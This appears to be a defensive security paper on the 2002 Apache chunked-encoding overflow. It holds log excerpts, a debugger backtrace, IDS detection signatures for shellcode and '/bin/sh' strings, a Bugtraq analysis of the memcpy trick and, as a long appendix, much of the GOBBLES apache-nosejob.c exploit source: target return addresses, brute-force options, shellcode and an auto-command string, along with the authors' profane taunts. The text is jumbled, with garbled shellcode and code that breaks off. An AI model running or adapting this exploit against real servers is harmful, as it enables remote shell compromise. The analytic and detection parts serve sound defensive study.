[Wed Sep 11 09:27:19 2002] [notice] child pid 8088 exit signal Segmentation fault (11)
[Wed Sep 11 09:27:19 2002] [notice] child pid 8087 exit signal Segmentation fault (11)
[Wed Sep 11 09:27:19 2002] [notice] child pid 8086 exit signal Segmentation fault (11)
[Wed Sep 11 09:27:19 2002] [notice] child pid 8085 exit signal Segmentation fault (11)
[Wed Sep 11 09:27:19 2002] [notice] child pid 8084 exit signal Segmentation fault (11)
[Wed Sep 11 09:27:20 2002] [notice] child pid
8114 exit signal Segmentation fault (11)
Finding errors like this in the a web server log
would be cause for concern for any system administrator.
The following shows up in the httpd access log file
(access_log): - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400] "GET / HTTP/1.1" 400 363 - - [11/Sep/2002:09:19:54 -0400]
"GET / HTTP/1.1" 400 363
This repeated request to the httpd server at a relatively high rate might tip off an alert system administrator that a piece of software somewhere is hammering their http daemon. Finding this in the access_log file would almost certainly be followed up with a scan of the error_log, which would uncover the massive amounts of httpd processes terminating with segmentation faults.
The best defense against this exploit would be to upgrade your apache installation to one of the patched releases. The release that contains the security fix for the 1.3 version of apache is 1.3.26. You can download the source at the following URL:
The 2.0 code branch of apache also has a release which has fixed this vulnerability:
If you have a version of apache installed that is
less than 1.3.26 or 2.0.40 and you would like to check whether or not you are
vulnerable, simply telnet to the httpd server port and paste the test HTTP post
request that was shown earlier (Joe Testa's Usenet post). If the request
causes a segmentation fault on one of your httpd processes, you are vulnerable.
The IDS signatures above will go far to detect an
attack underway and with a sophisticated firewall feedback mechanism in
place, it can even help guard against an attack.
The vendor (The Apache Software Foundation) should
(and did) patch the vulnerability in http_protocol.c such that the call to
ap_bread is not made with a negative length to read value. Perhaps using
an unsigned integer variable to store the number of bytes to read would be the
best fix, however, casting can be used as is seen below. The following was
suggested as a possible patch for this vulnerability, however, it is not the
official apache patch and wasn't tested8:
--- http_protocol.c.vuln Fri Jun 14 16:12:50 2002
+++ http_protocol.c Fri Jun 14 16:13:47 2002 @@ -2171,7 +2171,7
@@ /* Otherwise, we are in the midst of reading a chunk of data */
- len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining;
+ len_to_read = (r->remaining >
(unsigned int)bufsiz) ? bufsiz : r-> remaining; len_read =
ap_bread(r->connection->client, buffer, len_to_read); if (len_read <=
0) {
The changes made between version 1.3.24 and 1.3.26 are more extensive than this simple modification so, the use of this patch is definitely not recommended.
Appendix A shows the source code for the apache-nosejob.c
exploit. The file contains line numbers which will be referenced
Line numbers 1-195 are seemingly gibberish with many,
many, cryptic and hard to decipher meanings. Also, the header from the
previous version of the exploit (apache-scalp.c) is included from line 196 to
305. As with the new header comments, much of it is cryptic and hard to
understand. However, if you look close enough, there are some interesting
points to take from the comments:
This line refers to the brute force mode of
operation. I think this is significant because it is repeated multiple
times throughout the source code.
This seems to indicate that the web server that has
the bugtraq.org mailing list is vulnerable to this very
* Thx to all those GOBBLES antagonizers. Your insults fuel our desire to
* work harder to gain more fame.
This gives a little insight into the psyche of the
hacker/cracker. They definitely do things for notoriety and respect among
their peers. This is consistent with the open source community in general,
however, this work tends to be more unethical. Refer to "How to Become a
Hacker" written by Eric Steven Raymond for more information on hacker
* 3APAPAPA said this can't be done on FreeBSD. He probably also thinks
* qmail can't be exploited remotely. Buzzz! There we go speaking through
* our asses again. Anyways we're looking forward to his arguments on why
* this isn't exploitable on Linux and Solaris.
This is significant because it refers to a potential
exploit for Linux. Up to this point in time, only the BSD family of UNIX
is affected by this exploit (not considering brute force
* + ability to execute custom commands when shellcode replies -- great for
* mass hacking
This exploit could very easily be combined with a
scanner to produce an Internet worm to attack BSD systems.
* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
* the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
* their crappy memcpy implementation that makes this 32-bit impossibility
* very easy to accomplish.
This is a reference to the BSD implementation of
memcpy. See above for the explanation of why the BSD memcpy implementation
helps this overflow succeed.
Now, into the functional code:
char shellcode[] =
These lines contain the shell code (345-361).
This is the malicious code that needs to be run by
the buffer overflow. For a detailed explanation of what a shellcode is and
how it is used in a buffer overflow, see "Smashing the Stack for Fun and Profit"
in Phrack #49.
void usage(void) {
(390 - 419)
This is a nice usage function that tells script
kiddies how to run the program. It also lists all the targets the
parameters that are known to work.
int main(int argc, char *argv[]) {
(422 - end)
The main function does two main things. The
first thing is to parse the arguments passed in on the command line. The
arguments specify whether the specific target mode will be used or the brute
force mode. The second thing done is the exploit
while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) {
This section of code processes the command line
printf("[*] Resolving target host.. ");
The lines following this one do the actual exploit work.
The following is a pseudo-code representation of the
exploit section (547-end):
main() {
{ /* response checking */
} /* response checking */
} /* brute force loop
} /* main */
You can find the source code for this exploit at Packet Storm (http://packetstorm.decepticons.org/ ) or at the following links:
> http://www.immunitysec.com/GOBBLES/exploits/apache-nosejob.c
> http://www.immunitysec.com/GOBBLES/exploits/apache-scalp.c
The following resources were very handy when researching this exploit:
> http://www.counterpane.com/alert-apache.html
1. Internet Storm Center. "Top Ten
Ports." URL:http://isc.incidents.org/top10.html
2. W3C. "Basic HTTP as defined in
1992." URL:http://www.w3.org/Protocols/HTTP/HTTP2.html
3. Aleph One. "Smashing the Stack for Fun and
Profit." Phrack. URL:http://www.phrack.com/show.php?p=49&a=14
4. Kaemph, Michel. "Vudo malloc
tricks." Phrack. URL:http://www.phrack.com/show.php?p=57&a=8
5. gera. ric. "Advances in format
string exploitation." Phrack. URL:http://www.phrack.com/show.php?p=59&a=7
6. www.cgisecurity.com. "The
Cross Site Scripting FAQ." URL:http://www.cgisecurity.com/articles/xss-faq.shtml
7. Skoudis, Ed. Cole, Eric. SANS
Track 4 Manual. SANS Institute, 2002.
8. HTTP Protocol Specification, RFC 2616:
9. Counterpane. "Apache Data Chunking
Stack Overflow." Counterpane Security Alerts. URL:http://www.counterpane.com/alert-apache.html
10. Apache Software Foundation. "Apache
HTTPD Server Project." URL:http://www.apache.org/httpd
11. Netcraft. "Netcraft Web Server
Survey." URL:http://www.netcraft.com/survey/
12. Jupitermedia Corporation. "ASP
101" URL:http://www.asp101.com/
13. Raymond, Eric S. "The Cathedral and
the Bazaar." 12 September 2002. URL:http://www.tuxedo.org/~esr/writings/cathedral-bazaar
14. Raymond, Eric S. "The Halloween
Memo Analysis." 12 September 2002. URL:http://www.opensource.org/halloween/halloween1.php
15. December, John. Ginsburg,
Mark. HTML & CGI Unleashed. Sams.net Publishing,
16. ISS X-Force. "Remote Compromise
Vulnerability in Apache HTTP Server." SecurityFocus Online - Bugtraq
Mailing List. URL:http://online.securityfocus.com/archive/1/277249
17. Packet Storm Security. "apache-nosejob.c"
18. Laurie, Ben. "Re: Apache
Exploit." Bugtraq Mailing List. URL:http://cert.uni-stuttgart.de/archive/bugtraq/2002/06/msg00287.html
19. Testa, Joe. "Re: ISS Advisory: Apache " Bugtraq Mailing List. URL:http://online.securityfocus.com/archive/1/277738/2002-06-16/2002-06-22/0
GET / HTTP/1.1
Host: apache-nosejob.c
uÎë½1ÀPQP1À°ZÍÿD$|$uï1ÀPÆ$4$hBLE*h*GOBã° PS°PP°Í1ÀPhn/shh//biãPSáPQSP°;ÍÌ
[repeated many times]
#0 0x400de175 in memcpy () from /lib/libc.so.6
#1 0x80648a8 in ap_bread (fb=0x80d194c, buf=0xbfffd802, nbyte=-150)
at buff.c:815
#2 0x8077d3b in ap_get_client_block (r=0x80f222c,
buffer=0xbfffd802 "\023@H\016\030@", bufsiz=8180) at http_protocol.c:2176
#3 0x8077f2c in ap_discard_request_body (r=0x80f222c) at http_protocol.c:2246
#4 0x806dded in default_handler (r=0x80f222c) at http_core.c:3808
#5 0x806684c in ap_invoke_handler (r=0x80f222c) at http_config.c:529
#6 0x807bcbf in process_request_internal (r=0x80f222c) at http_request.c:1308
#7 0x807c116 in ap_internal_redirect (new_uri=0x80f2204 "/index.html",
r=0x80e0944) at http_request.c:1436
#8 0x805b296 in handle_dir (r=0x80e0944) at mod_dir.c:174
#9 0x80667d9 in ap_invoke_handler (r=0x80e0944) at http_config.c:517
#10 0x807bcbf in process_request_internal (r=0x80e0944) at http_request.c:1308
#11 0x807bd26 in ap_process_request (r=0x80e0944) at http_request.c:1324
#12 0x80729b0 in child_main (child_num_arg=0) at http_main.c:4570
#13 0x8072b71 in make_child (s=0x80c8284, slot=0, now=1031746741)
at http_main.c:4685
#14 0x8072cec in startup_children (number_to_start=5) at http_main.c:4767
#15 0x807337d in standalone_main (argc=2, argv=0xbffffbf4) at http_main.c:5072
---Type <return> to continue, or q <return> to quit---
#16 0x8073bdc in main (argc=2, argv=0xbffffbf4) at http_main.c:5417
(gdb) c
Program received signal SIGSEGV, Segmentation fault.
0x400de197 in memcpy () from /lib/libc.so.6
alert tcp $EXTERNAL_NET any ->
(msg: "Apache chunked encoding exploit,
AAAAA padding"; flags: A+; \
alert tcp $EXTERNAL_NET any ->
(msg: "Apache chunked encoding exploit,
h/sh.h/bin (i.e. /bin/sh) attempt "; \
flags: A+; content: "|68 2f 73
68 00 68 2f 62 69 6e|";)
alert tcp $EXTERNAL_NET any ->
(msg: "Apache chunked encoding exploit,
/bin/sh attempt "; flags: A+; \
content: "/bin/sh";)
alert tcp $EXTERNAL_NET any ->
(msg: "Apache chunked encoding exploit,
uname -a"; flags: A+; \
content: "uname -a";)
Look for signs of a successful exploit:
(msg: "id check returned www"; flags: A+; \
content: "uid="; content: "(www)";)
(msg: "id check returned nobody"; flags: A+; \
content: "uid="; content: "(nobody)";)
(msg: "id check returned web"; flags: A+; \
content: "uid="; content: "(web)";)
(msg: "id check returned http"; flags: A+; \
content: "uid="; content: "(http)";)
(msg: "id check returned apache"; flags: A+; \
content: "uid="; content: "(apache)";)
Ulf Bahrenfuss wrote:
> Hi!
> Does anyone know, if the chunk handling vulnerability carries through
> a proxy i.e. Squid or Webcache? (Updating is currently not possible,
> because it is not the plain apache, but the Oracle IAS flavour...)
> Or has anyone further information how
this vulnerabilty really works?
Here's an analysis I wrote for iternal use at the ASF - it doesn't go
into detail on the shellcode (which is just the usual shellcode), but
does explain how the expected SEGV from overrunning the stack is
avoided. Note that someone (sorry, forgotten who) posted a similar
generic analyis a day or two ago - this one was independently arrived at
and refers to the Gobbles attack
First, the exploit code puts stuff on the stack (legitimately, in
buffers). It then arranges a negative offset, as previously described,
to be handed to memcpy. Here's where it gets cute. memcpy has memmove
semantics (i.e., it copies in the correct direction to handle
overlapping source/dest) on both OpenBSD and FreeBSD (in fact, I believe
this is a requirement for this exploit to work on any system where the
stack grows downwards). As a result, when the memcpy is attempted, it is
done backwards (i.e. the copy starts at source+length-1 -> dest+length-1
and downwards for length bytes). Now, here's the cute bit. memmove (et
al) are optimised to copy in 4 byte chunks, for speed. This means that
they have to copy the leftover bytes separately. This is handled by
copying the odd 0-3 bytes before the
remaining bytes.
So, if you arrange for the negative offset of the buffer to point at
where the length is stored on the stack, then when these odd bytes are
copied, you can modify the length. What they do is modify an initial
length of 0xffffxxxx to 0x0000xxxx - note that the length is also the
offset, so there is also a certain amount of luck involved, but all that
is needed is for the offset to be small enough that the length remains
big enough to zap enough stack (since the offset is a few hundred, that
leaves the length at near to 64k, which is plenty to zap a few return
addresses). Then, when the length is reloaded to do the second copy, it
is miraculously smaller (I boggled first time I saw this in the
debugger), and doesn't cause the expected SEGV, just nice corruption of
the stack, as
So, to illustrate with
0x400f9d6c <memcpy>: push %esi
0x400f9d6d <memcpy+1>: push %edi
0x400f9d6e <memcpy+2>: mov 0xc(%esp,1),%edi
0x400f9d72 <memcpy+6>: mov 0x10(%esp,1),%esi
0x400f9d76 <memcpy+10>: mov 0x14(%esp,1),%ecx
0x400f9d7a <memcpy+14>: cmp %esi,%edi
0x400f9d7c <memcpy+16>: jae 0x400f9d94 <memcpy+40>
at this point, we've decided to go backwards, edi is dest, esi is source
and ecx is count (aka -146 aka
0x400f9d94 <memcpy+40>: add %ecx,%edi
0x400f9d96 <memcpy+42>:
add %ecx,%esi
Now we are pointing at the "end" of the buffers (i.e. somewhere down the
stack from them, and, lo and behold, edi now points at the two MS bytes
of the count)
0x400f9d98 <memcpy+44>: std
0x400f9d99 <memcpy+45>:
and $0x3,%ecx
calculate spare bytes (2 in this
0x400f9d9c <memcpy+48>: dec %edi
0x400f9d9d <memcpy+49>: dec %esi
0x400f9d9e <memcpy+50>: repz movsb
and copy them - in fact two zeroes are copied, so the length is now
0x400f9da0 <memcpy+52>:
mov 0x14(%esp,1),%ecx
load the length again (now
0x400f9da4 <memcpy+56>:
shr $0x2,%ecx
divide by 4
0x400f9da7 <memcpy+59>: sub $0x3,%esi
0x400f9daa <memcpy+62>: sub $0x3,%edi
0x400f9dad <memcpy+65>: repz movsl
and copy that many longs (i.e. just shy of 64k bytes). Here is where we
would have gone bang with a SEGV, but don't
coz of the cunningness.
0x400f9daf <memcpy+67>: mov 0xc(%esp,1),%eax
0x400f9db3 <memcpy+71>: pop %edi
0x400f9db4 <memcpy+72>: pop %esi
0x400f9db5 <memcpy+73>: cld
0x400f9db6 <memcpy+74>:
return to a corrupted return address (or is it the next one up that's
corrupted? not sure, don't care). And hey
presto, remote shell.
Note that glibc is _not_ vulnerable in this way, so I have no idea how
the Linux attack works. I have not examined
[1] For those not familiar with this class of exploit, the stack is
corrupted such that the return address for some function call points to
code which spawns a shell, which is then used by the attacker to have
his or her evil way with your machine.
* apache-nosejob.c - Now with FreeBSD & NetBSD targets ;>
* Your high priced security consultant's plane ticket: $1500
* Your high priced security consultant's time: $200/hour
* RealSecure nodes all over your company: $200,000
* Getting owned by 0day: Priceless
* If somebody could do us a big favor and contact Jennifer Garner and ask
* her to make a journey to Vegas this summer for Defcon, to hang out with
* the members of GOBBLES Security who are all huge fans of hers, we would
* be eternally grateful. We are 100% serious about this. We would love
* to have a chance to sit down and have a nice conversation with her during
* the conference -- something little to make our lives feel more complete.
* Just show her this picture, and she'll understand that we're not some
* crazy obsessive fanatical lunatics that she would want to avoid. ;-)
* http://phrack.org/summercon2002/GOBBLES_show.jpg
* We even promise to keep our clothes on!
* Thx to all those GOBBLES antagonizers. Your insults fuel our desire to
* work harder to gain more fame.
* This exploit brought to you by a tagteam effort between GOBBLES Security
* and ISS X-Forces. ISS supplied the silly mathematical computations and
* other abstract figures declaring the exploitation of this bug to be
* impossible, without factoring in the chance that there might be other
* conditions present that would allow exploitation. After the failure of
* ISS' Santa Claus, GOBBLES Security didn't want to disappoint the kids and
* the security consultants and have brought forth a brand new shiny toy for
* all to marvel at.
* GOBBLES Security Sex Force: A lot of companies like to let you know
* their employees have the biggest dicks. We're firm believers in the
* idea that it's not the size of the wave, but rather the motion of the
* ocean -- we have no choice anyway.
* 3APAPAPA said this can't be done on FreeBSD. He probably also thinks
* qmail can't be exploited remotely. Buzzz! There we go speaking through
* our asses again. Anyways we're looking forward to his arguments on why
* this isn't exploitable on Linux and Solaris. Lead, follow, or get the
* fuck out of the way.
* Weigh the chances of us lying about the Linux version. Hmm, well so far
* we've used a "same shit, different smell" approach on *BSD, so you could
* be forgiven for thinking we have no Linux version. Then bring in the
* reverse psychology factor of this paragraph that also says we don't have
* one. But we'd say all of the above to make you believe us. This starts to
* get really complicated.
* ---
* God knows I'm helpless to speak
* On my own behalf
* God is as helpless as me
* Caught in the negatives
* We all just do as we please
* False transmissions
* I hope God forgives me
* For my transgressions
* It's what you want
* To know no consequences
* It's what you need
* To fucking bleed
* It's all too much
* ---
* Changes:
* + can do hostname resolution
* + uses getopt()
* + works against freebsd and netbsd now
* + ability to execute custom commands when shellcode replies -- great for
* mass hacking
* + rand() value bitshifted for more randomness in our progress bar tongues
* + more targets ;> BUT REMEMBER BRUTE FORCE MODE!!!
* + [RaFa] complained that the first version didn't let him hack through
* proxies. New shellcode has been added for additional fun. It's real
* funky, monkey, do you trust? Didn't think so.
* Fun to know:
* + Most apache installations don't even log the attack
* + GOBBLES Security is not playing games anymore.
* + GOBBLES Security has more active members than w00w00.
* + w00w00.org is still vulnerable to this exploit.
* + w00w00 might release another AIM advisory soon about how evil the
* whole DMCA thing is. *yawn*
* Fun to do:
* + Spot the #openbsd operator who can figure out how to use this!
* + Join #snort and laugh at their inadequacies
* + Question the effectiveness of Project Honeynet, when they have yet
* to discover the exploitation of a single "0day" vulnerability in the
* 0DAY T0 PR0V3 US WR0NG!!@# Dumb twats.
* 80% of #openbsd won't be patching Apache because:
* + "It's not in the default install"
* + "It's only uid nobody. So what?"
* + "Our memcpy() implementation is not buggy"
* + "I couldn't get the exploit to work, so it must not actually be
* exploitable. Stupid GOBBLES wasting my time with nonsense"
* + jnathan's expert advice to his peers is that "this is not much of
* a security issue" -- @stake + w00w00 + snort brain power in action!
* Testbeds: hotmail.com, 2600.com, w00w00.org, efnet.org, atstake.com,
* yahoo.com, project.honeynet.org, pub.seastrom.com
* If you're using this exploit against a vulnerable machine (that the
* exploit is supposed to work on, quit mailing us asking why apache-scalp
* doesn't work against Linux -- dumbasses) and it does not succeed, you
* will have to play with the r|d|z values and * BRUTEFORCE * BRUTEFORCE *
* We wrote this for ethical purposes only. There is such a thing as an
* "ethical hacker" right?
* This should make penetration testing _very_ easy. Go out and make some
* money off this, by exploiting the ignorance of some yahoo who will be
* easily ./impressed with your ability to use gcc. No, we won't provide
* you with precompiled binaries. Well, at least for *nix. ;-)
* --- GOBBLES Security is no longer accepting new members. We're now a
* closed group. Of course, we'll still share our warez with the
* community at large, but for the time we have enough members.
* Greets to our two newest members:
* -[RaFa], Ambassador to the Underworld
* -pr0ix, Director of Slander and Misinformation
* --- i wont be surprised that when I return tomorrow morning the
* internet will have come to a grinding halt with people crying for
* medics
* --- the internet will be over in a couple of months
* --- nobody in #openbsd can get it to work... #netbsd people seem to be
* managing fine...
* --- they dont grasp the concept of the base address... i seriously
* thought this was the most kiddie friendly exploit ever released
* --- even bb could get it working. look at vuln-dev
* --- we have to try to bump that threatcon up a notch
* --- what the alldas url now? how many defacements appeared yet?
* --- we should do a poem entitled "default openbsd" and mention how
* it just sits there... inanimate... soon theo will be stripping the
* network code so not even gobkltz.c works... as theo's paranoia
* increases and he becomes out of sync with the real world, strange
* things start to happen with openbsd... CHANGELOG: "now also safe
* from the voices. 6 years without the screaming in the default
* install"
* --- i can port it to windows.. i can make a gui using mfc.. with
* a picture of the skull & crossbones
* --- Has anyone ever been caught by an IDS? I certainly never have.
* This one runs on many machines. It ports to HP-UX.
* --- strange how mr spitzner didn't know honeynet.org was owned
* --- an official openbsd mirror is still vulnerable? dear god they're
* out of it!
* --- I think we're finally famous.
* --- we're on the front page of securityfocus, and we didn't even have
* to deface them! too bad the article wasn't titled, "Hi BlueBoar!"
* --- we need GOBBLES group photos at defcon holding up signs that say
* "The Blue Boar Must Die"
* --- project.honeynet.org is _still_ vulnerable a day after the exploit
* was made public? hahaha!
* --- exploit scanner? www.google.com -- search for poweredby.gif + your
* *bsd of choice!
* --- i stopped taking my antipsychotics last night. say no 2 drugz!
* --- we wonder how much they'll like GeneralCuster.exe
* --- wonder if ISS will use our code in their "security assesment"
* audits, or if they'll figure out how to exploit this independantly.
* either way they're bound to make a lot of money off us, bastards.
* --- forget w00giving, this year itz thanksgiving.
* --- the traffic to netcraft.com/whats will be through the roof for the
* next few months!
* --- every company with a hub has been sold multiple realsensor units
* --- full disclosure is a necessary evil, so quit your goddamned whining.
* --- people just assume they know what we mean by "testbed"
* --- i can't believe that people still disbelieve in the existance of
* hackers... i mean, what is all this bullshit about people being
* shocked that hackers write programs to break into systems so that
* they can use those programs to break into systems? are their minds
* that small?
* --- we're far from done. . .
* apache-scalp.c
* ". . . and Doug Sniff said it was a hole in Epic."
* ---
* Disarm you with a smile
* And leave you like they left me here
* To wither in denial
* The bitterness of one who's left alone
* ---
* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
* the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
* their crappy memcpy implementation that makes this 32-bit impossibility
* very easy to accomplish. This vulnerability was recently rediscovered by a slew
* of researchers.
* The "experts" have already concurred that this bug...
* - Can not be exploited on 32-bit *nix variants
* - Is only exploitable on win32 platforms
* - Is only exploitable on certain 64-bit systems
* However, contrary to what ISS would have you believe, we have
* successfully exploited this hole on the following operating systems:
* Sun Solaris 6-8 (sparc/x86)
* FreeBSD 4.3-4.5 (x86)
* OpenBSD 2.6-3.1 (x86)
* Linux (GNU) 2.4 (x86)
* Don't get discouraged too quickly in your own research. It took us close
* to two months to be able to exploit each of the above operating systems.
* There is a peculiarity to be found for each operating system that makes the
* exploitation possible.
* Don't email us asking for technical help or begging for warez. We are
* busy working on many other wonderful things, including other remotely
* exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
* the community that those holes don't exist? We wonder who's paying her.
* This code is an early version from when we first began researching the
* vulnerability. It should spawn a shell on any unpatched OpenBSD system
* running the Apache webserver.
* We appreciate The Blue Boar's effort to allow us to post to his mailing
* list once again. Because he finally allowed us to post, we now have this
* very humble offering.
* This is a very serious vulnerability. After disclosing this exploit, we
* hope to have gained immense fame and glory.
* Testbeds: synnergy.net, monkey.org, 9mm.com
* Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
* bugs are great.
* --- you just know 28923034839303 admins out there running
* OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
* weekend"
* --- "Five years without a remote hole in the default install". default
* package = kernel. if theo knew that talkd was exploitable, he'd cry.
* --- so funny how apache.org claims it's impossible to exploit this.
* --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
* --- I hope Theo doesn't kill himself
* --- heh, this is a middle finger to all those open source, anti-"m$"
* idiots... slashdot hippies...
* --- they rushed to release this exploit so they could update their ISS
* scanner to have a module for this vulnerability, but it doesnt even
* work... it's just looking for win32 apache versions
* --- no one took us seriously when we mentioned this last year. we warned
* them that moderation == no pie.
* --- now try it against synnergy :>
* xxxx this thing is a major exploit. do you really wanna publish it?
* oooo i'm not afraid of whitehats
* xxxx the blackhats will kill you for posting that exploit
* oooo blackhats are a myth
* oooo so i'm not worried
* oooo i've never seen one
* oooo i guess it's sort of like having god in your life
* oooo i don't believe there's a god
* oooo but if i sat down and met him
* oooo i wouldn't walk away thinking
* oooo "that was one hell of a special effect"
* oooo so i suppose there very well could be a blackhat somewhere
* oooo but i doubt it... i've seen whitehat-blackhats with their ethics
* and deep philosophy...
* --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
* --- super@GOBBLES.NET (low-level.net)
* GOBBLES Security
* GOBBLES@hushmail.com
* http://www.bugtraq.org
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#define HOST_PARAM "apache-nosejob.c" /* The Host: field */
#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, now use another bug/backdoor/feature (hi Theo!) to gain instant r00t';\n"
#define PADSIZE_1 4
#define PADSIZE_2 5
#define REP_POPULATOR 24
#define REP_SHELLCODE 24
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n);
p += n;
char shellcode[] =
struct {
char *type; /* description for newbie penetrator */
int delta; /* delta thingie! */
u_long retaddr; /* return address */
int repretaddr; /* we repeat retaddr thiz many times in the buffer */
int repzero; /* and \0'z this many times */
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80f3a00, 6, 36 },
{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80a7975, 6, 36 },
{ "OpenBSD 3.0 x86 / Apache 1.3.20", -146, 0xcfa00, 6, 36 },
{ "OpenBSD 3.0 x86 / Apache 1.3.22", -146, 0x8f0aa, 6, 36 },
{ "OpenBSD 3.0 x86 / Apache 1.3.24", -146, 0x90600, 6, 36 },
{ "OpenBSD 3.0 x86 / Apache 1.3.24 #2", -146, 0x98a00, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.20", -146, 0x8f2a6, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.23", -146, 0x90600, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24", -146, 0x9011a, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2", -146, 0x932ae, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146, 0x1d7a00, 6, 36 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)", -90, 0x80eda00, 5, 42 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", -90, 0x80efa00, 5, 42 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", -90, 0x80efa00, 5, 42 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)", -90, 0x80efa00, 5, 42 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)", -90, 0x80efa00, 5, 42 },
void usage(void) {
int i;
printf("GOBBLES Security Labs\t\t\t\t\t- apache-nosejob.c\n\n");
printf("Usage: ./apache-nosejob <-switches> -h host[:80]\n");
printf(" -h host[:port]\tHost to penetrate\n");
printf(" -t #\t\t\tTarget id.\n");
printf(" Bruteforcing options (all required, unless -o is used!):\n");
printf(" -o char\t\tDefault values for the following OSes\n");
printf(" \t\t\t(f)reebsd, (o)penbsd, (n)etbsd\n");
printf(" -b 0x12345678\t\tBase address used for bruteforce\n");
printf(" \t\t\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\n");
printf(" -d -nnn\t\tmemcpy() delta between s1 and addr to overwrite\n");
printf(" \t\t\tTry -146/obsd, -150/fbsd, -90/nbsd.\n");
printf(" -z #\t\t\tNumbers of time to repeat \\0 in the buffer\n");
printf(" \t\t\tTry 36 for openbsd/freebsd and 42 for netbsd\n");
printf(" -r #\t\t\tNumber of times to repeat retadd in the buffer\n");
printf(" \t\t\tTry 6 for openbsd/freebsd and 5 for netbsd\n");
printf(" Optional stuff:\n");
printf(" -w #\t\t\tMaximum number of seconds to wait for shellcode reply\n");
printf(" -c cmdz\t\tCommands to execute when our shellcode replies\n");
printf(" \t\t\taka auto0wncmdz\n");
printf("\nExamples will be published in upcoming apache-scalp-HOWTO.pdf\n");
printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
printf(" ID / Return addr / Target specification\n");
for(i = 0; i < sizeof(targets)/sizeof(victim); i++)
printf("% 3d / 0x%.8lx / %s\n", i,
targets[i].retaddr, targets[i].type);
int main(int argc, char *argv[]) {
char *hostp, *portp, *cmdz = DEFAULT_CMDZ;
u_char buf[512], *expbuf, *p;
int i, j, lport, sock;
int bruteforce, owned, progress, sc_timeout = 5;
int responses, shown_length = 0;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
if(argc < 4)
bruteforce = 0;
memset(&victim, 0, sizeof(victim));
while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) {
switch(i) {
/* required stuff */
case 'h':
hostp = strtok(optarg, ":");
if((portp = strtok(NULL, ":")) == NULL)
portp = "80";
/* predefined targets */
case 't':
if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
printf("Invalid target\n");
return -1;
memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));
/* bruteforce! */
case 'b':
victim.type = "Custom target";
victim.retaddr = strtoul(optarg, NULL, 16);
printf("Using 0x%lx as the baseadress while bruteforcing..\n", victim.retaddr);
case 'd':
victim.delta = atoi(optarg);
printf("Using %d as delta\n", victim.delta);
case 'r':
victim.repretaddr = atoi(optarg);
printf("Repeating the return address %d times\n", victim.repretaddr);
case 'z':
victim.repzero = atoi(optarg);
printf("Number of zeroes will be %d\n", victim.repzero);
case 'o':
switch(*optarg) {
case 'f':
victim.type = "FreeBSD";
victim.retaddr = 0x80a0000;
victim.delta = -150;
victim.repretaddr = 6;
victim.repzero = 36;
case 'o':
victim.type = "OpenBSD";
victim.retaddr = 0x80000;
victim.delta = -146;
victim.repretaddr = 6;
victim.repzero = 36;
case 'n':
victim.type = "NetBSD";
victim.retaddr = 0x080e0000;
victim.delta = -90;
victim.repretaddr = 5;
victim.repzero = 42;
printf("[-] Better luck next time!\n");
/* optional stuff */
case 'w':
sc_timeout = atoi(optarg);
printf("Waiting maximum %d seconds for replies from shellcode\n", sc_timeout);
case 'c':
cmdz = optarg;
if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {
printf("[-] Incomplete target. At least 1 argument is missing (nmap style!!)\n");
